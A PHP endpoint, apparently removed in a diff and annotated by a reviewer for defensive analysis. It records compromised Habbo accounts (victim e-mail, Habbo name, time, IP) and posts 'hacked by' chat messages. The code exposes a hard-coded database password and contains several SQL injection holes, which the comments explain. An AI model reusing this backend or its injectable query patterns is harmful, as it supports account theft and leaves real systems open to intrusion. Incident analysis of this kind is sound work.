- <?
// Reviewer annotation (defensive analysis; code lines are unchanged).
// Purpose, as far as the visible code shows: an HTTP endpoint that checks a
// one-time token, looks up a row in hbx_users, then writes one line to
// hbx_chat and one row to hbx_logs. The chat text translates to
// "the Habbo <name> was hacked by <nick>", so hbx_logs appears to be a record
// of compromised accounts (e-mail, Habbo name, time, caller IP) — treat its
// rows as victim data during incident handling.
// Inputs are all GET parameters: token, hid, id, email, h, club.
// The script relies on the short open tag and on the legacy mysql_* extension,
// which was removed in PHP 7.0, so it only runs on end-of-life PHP versions.

// Database host, account, password and schema are hard-coded in the source:
// anyone who can read this file can read them, and they cannot be rotated
// without editing code.
- $mysql_host = "localhost";
- $mysql_user = "myhbxcoc";
- $mysql_password = "eX290sed3V";
- $mysql_database = "myhbxcoc_hbx";
// Connection failure prints mysql_error() to the client (information leak).
- mysql_connect($mysql_host,$mysql_user,$mysql_password) or die(mysql_error());
// Return value of mysql_select_db() is not checked.
- mysql_select_db($mysql_database);
// '@' silences any warning from these two calls.
- @date_default_timezone_set("America/Fortaleza");
- @session_start();
// Throttle expiry: the marker holds "now + 25 s" (set further down); once the
// current time has passed it, the marker is dropped. The key is read without
// an isset() check, so the first request of a session reads an undefined index.
- if((time() - $_SESSION['flood'])>0) {
- unset($_SESSION['flood']);
- }
// NOTE(review): $_GET['token'] is concatenated into the SQL text with no
// escaping or parameter binding — this statement is injectable. The remedy is
// a prepared statement with a bound parameter.
- $query = mysql_query("select * from `hbx_securityTokens` where token = '".$_GET['token']."'");
// $query is reused: first the result resource, now the fetched row (or false).
- $query = mysql_fetch_array($query);
// No matching token row -> abort. The Portuguese text reads "An attempt to
// exploit a flaw was detected [INVALID X-TOKEN]".
- if(empty($query)) {
- die("<b style=color:red>XSRF Detected</b><br><br>Uma tentativa de explorar falha foi detectada [X-TOKEN INVALIDO]");
- }
// Token is deleted after a successful match, making it single-use.
// NOTE(review): same unescaped concatenation as the SELECT above, this time
// inside a DELETE.
- mysql_query("delete from `hbx_securityTokens` where token = '".$_GET['token']."'");
// addslashes() is not charset-aware and is not a substitute for bound
// parameters; it is the only protection on hid, id and email.
- $hbx_id = addslashes($_GET['hid']);
// Throttle check: an existing marker aborts the request, otherwise the marker
// is set to now + 25 s. The token has already been consumed at this point, so
// a throttled request still burns its token. The throttle is per PHP session,
// so it only limits clients that keep their session cookie.
- isset($_SESSION['flood'])? die("Anti-Flood!") : $_SESSION['flood'] = time()+25;
// Look up the hbx_users row matching both id and hbx_id; SQL errors are echoed
// to the client through die(mysql_error()).
- $query = @mysql_query("select * from hbx_users where id='".addslashes($_GET['id'])."' and hbx_id = '$hbx_id'") or die(mysql_error());
- $dados = mysql_fetch_array($query);
// Empty nick (including "no row found") aborts; message: "Id does not exist."
- if($dados['nick']=="") die("Id não existe.");
// NOTE(review): $nick comes from the database and is later placed into two
// INSERT statements and into HTML without any escaping (second-order
// injection if the stored nick contains quotes or markup).
- $nick = $dados['nick'];
- $mail = addslashes(strip_tags($_GET['email']));
// Format uses 'h' (12-hour clock) with no am/pm marker, so logged times are
// ambiguous between morning and afternoon; the zone is America/Fortaleza.
- $date = date("d/m/Y h:i:s");
// Address of the directly connected peer, stored as the log's ip column.
- $ip = $_SERVER['REMOTE_ADDR'];
// NOTE(review): htmlspecialchars() is an HTML-output encoder, not SQL
// escaping, yet $habbo is interpolated into both INSERT statements below.
- $habbo = htmlspecialchars($_GET['h']);
// Rejects an empty value or the literal string "null"; message: "No habbo."
- if(!$habbo||$habbo == "null") die("Sem habbo.");
// Fixed sender name used for the chat line.
- $n_ick = "» BotHBX";
// HTML is stored in the chat table; $nick is embedded unencoded, so if the
// chat is later rendered as HTML (presumably, given the <font>/<b> tags —
// confirm against the viewer) this is a stored-markup injection point.
- $msg = "<font color=orange>o Habbo <b>$habbo</b> foi hackeado por <b>$nick</b>!</font>";
// $suc is assigned but never read. The message is wrapped in double quotes
// inside the SQL text; failures are echoed via die(mysql_error()).
- $suc = @mysql_query("INSERT INTO `hbx_chat` (`id`, `nick`, `message`, `del`,`hbx_id`) VALUES ('', '$n_ick', \"$msg\", '0','$hbx_id');") or die(mysql_error());
// Final write: the hbx_logs row. The response body is "S=" followed by the
// string form of mysql_query()'s return value ("1" on success, empty on
// failure); unlike the earlier queries there is no die() on error.
// NOTE(review): $_GET['club'] is concatenated raw into the VALUES list, and
// $nick / $habbo are not SQL-escaped — this statement is injectable as well.
- echo "S=".mysql_query("INSERT INTO `hbx_logs` (`id` ,
- `owner` ,
- `email` ,
- `habbo`,
- `date` ,
- `ip`,
- `hbx_id`,
- `club`
- )
- VALUES (
- NULL , '$nick', '$mail', '$habbo', '$date', '$ip','$hbx_id','".$_GET['club']."');");
- ?>